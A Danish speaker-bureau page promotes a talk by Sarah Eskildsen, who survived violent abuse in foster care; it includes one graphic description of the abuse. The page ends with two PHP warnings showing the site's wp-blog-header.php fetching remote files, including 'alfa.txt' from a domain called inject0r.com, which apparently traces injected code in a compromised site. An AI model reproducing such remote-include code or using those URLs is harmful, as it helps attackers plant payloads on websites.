img-us
  • asc

    Foredragsholder Sarah Eskildsen

  • asc

    Emne Tag lederskab i dit liv

  • asc

    pris 6000.-

Sarah er opvokset i en plejefamilie, hvor psykisk og fysisk vold var en barsk del af dagligdagen. Hun har kæmpet sig gennem en rejse med stor vrede, dyb angst og depression. I dag står hun stærk og transformeret.

Sarah sidder rank, mens hun fortæller om et af onklens utallige overgreb:
Han holder mig op i håret med sin arm og drejer mig rundt og rundt, så håret strammes helt. Jeg mærker nerven om hvert enkelt hårstrå. Så banker han mit hoved ind i væggen og slår mig brutalt lige på hovedet, hvor håret dækker. Netop her kan de blå mærker ikke ses, det ved han

Sarah gemmer de hårtotter, der ryger ud. Hun gemmer også andre beviser på overgreb, for selvom hun er barn og ikke kender til et normalt familieforhold, ved hun instinktivt, at onklens vilde og udspekulerede vold er forkert. En dag vil hun rejse sig. En dag vil hun fortælle sin historie.


En fortælling om fuldstændig transformation
Sarah var i familiepleje hos sin onkel fra hun var et til 14 år, og hans brutale vold resulterede i seks års fængsel. I dag er han er en gammel, syg mand, og Sarah bærer ikke nag. Hun bebrejder heller ikke sine forædre, der ikke kunne tage sig af hende.

I mange år var hadet, angsten og fortvivlelse ved at æde hende op. Hun har måtte finde en voldsom styrke i sit indre for at kunne skabe sit eget liv.

Alle taler om at tage lederskab for eget liv, men hvordan går man vejen?

Sarah har gjort det med både styrke og nænsomhed. Det har været en brutal rejse, hvor hun har sloges, råbt og skreget på at få adgang til sit eget liv. Hun har kæmpet som en kriger for at finde teknikker til at transformere sine smertelige oplevelser og følelser.

Hendes barndom gav ikke redskaber til at begå sig i livet. Hun blev systematisk trampet på, og hendes fritid bestod ikke af leg, men af arbejde og overlevelse.

I dag står hun som en stærk og velfungerende kvinde og mor, der på sit universitetsstudium får topkarakterer. Hendes sprog vidner om intelligens og stor venlighed, og hendes fremtoning er professionel efter flere års arbejde med film og som coach.

Fra grå dagligdag til ægte nærvær
Til foredraget vil Sarah fortælle om sin egen rejse fra et liv i asken til at stå transformeret efter målrettet og brutalt hårdt arbejde.

Sarah vil berette om, hvordan hun med stædighed og galgenhumor har lært at leve med, at freden ikke er en konstant tilstand. Hun fortæller om hvordan hun konkret har opbygget en værktøjskasse bl.a. til at håndtere og rumme negative følelser såsom afmagt, vrede, sorg og mindreværd samt om at rodfæstningen i noget større end hende selv har givet hende styrke.

Hun vil give tilhørerne både motivation og konkrete redskaber til at begynde at gå vejen selv - til at bevæge sig fra grå hverdag til en større bevidsthed om, at livet er her og nu.
SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Thomas Christopher Dominic Hansen

Carsten Islington

Sabrina Vitting-Seerup

Louise Bjørndal


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22